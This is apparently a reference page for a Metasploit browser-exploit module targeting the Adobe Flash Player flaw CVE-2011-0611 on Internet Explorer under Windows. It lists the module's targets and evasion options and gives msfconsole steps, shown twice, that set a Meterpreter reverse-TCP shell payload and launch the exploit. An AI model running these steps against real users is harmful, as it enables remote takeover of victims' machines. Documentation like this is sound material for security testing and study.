Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability
This module exploits a vulnerability in Adobe Flash Player that was discovered, and has been exploited actively in the wild. By embedding a specially crafted .swf file, Adobe Flash crashes due to an invalid use of an object type, which allows attackers to overwrite a pointer in memory, and results arbitrary code execution. Please note for IE 8 targets, Java Runtime Environment must be available on the victim machine in order to work properly.
Exploit Rank
- Normal
Exploit Authors
- sinn3r < sinn3r [at] metasploit.com >
Vulnerability References
- CVE-2011-0611
- OSVDB-71686
- BID-47314
- http://www.adobe.com/support/security/bulletins/apsb11-07.html
- http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0...
- http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zer...
- http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day...
- http://secunia.com/blog/210
Exploit Targets
- 0 - Automatic (default)
- 1 - IE 6 on Windows XP SP3
- 2 - IE 7 on Windows XP SP3
- 3 - IE 8 on Windows XP SP3
- 4 - IE 7 on Windows Vista
- 5 - IE 8 on Windows 7
Exploit Development
Similar Exploit Modules
- exploit/windows/browser/adobe_cooltype_sing
- exploit/windows/browser/adobe_flash_mp4_cprt
- exploit/windows/browser/adobe_flash_sps
- exploit/windows/browser/adobe_flashplayer_avm
- exploit/windows/browser/adobe_flashplayer_newfunction
- exploit/windows/browser/adobe_flatedecode_predictor02
- exploit/windows/browser/adobe_geticon
- exploit/windows/browser/adobe_jbig2decode
- exploit/windows/browser/adobe_media_newplayer
- exploit/windows/browser/adobe_shockwave_rcsl_corruption
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/browser/adobe_flashplayer_flash10o
msf exploit(adobe_flashplayer_flash10o) > show payloads
msf exploit(adobe_flashplayer_flash10o) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_flashplayer_flash10o) > set LHOST [MY IP ADDRESS]
msf exploit(adobe_flashplayer_flash10o) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/browser/adobe_flashplayer_flash10o
msf exploit(adobe_flashplayer_flash10o) > show payloads
msf exploit(adobe_flashplayer_flash10o) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_flashplayer_flash10o) > set LHOST [MY IP ADDRESS]
msf exploit(adobe_flashplayer_flash10o) > exploit
Exploit Module Options
| OBFUSCATE | Enable JavaScript obfuscation (default: true) |
| SRVHOST | The local host to listen on. This must be an address on the local machine or 0.0.0.0 (default: 0.0.0.0) |
| SRVPORT | The local port to listen on. (default: 8080) |
| SSL | Negotiate SSL for incoming connections |
| SSLCert | Path to a custom SSL certificate (default is randomly generated) |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3) |
| URIPATH | The URI to use for this exploit (default is random) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| ListenerComm | The specific communication channel to use for this service |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| HTML::base64 | Enable HTML obfuscation via an embeded base64 html object (IE not supported) (accepted: none, plain, single_pad, double_pad, random_space_injection) |
| HTML::javascript::escape | Enable HTML obfuscation via HTML escaping (number of iterations) |
| HTML::unicode | Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be) |
| HTTP::chunked | Enable chunking of HTTP responses via "Transfer-Encoding: chunked" |
| HTTP::compression | Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate) |
| HTTP::header_folding | Enable folding of HTTP headers |
| HTTP::junk_headers | Enable insertion of random junk HTTP headers |
| HTTP::server_name | Configures the Server header of all outgoing replies |
| TCP::max_send_size | Maximum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |
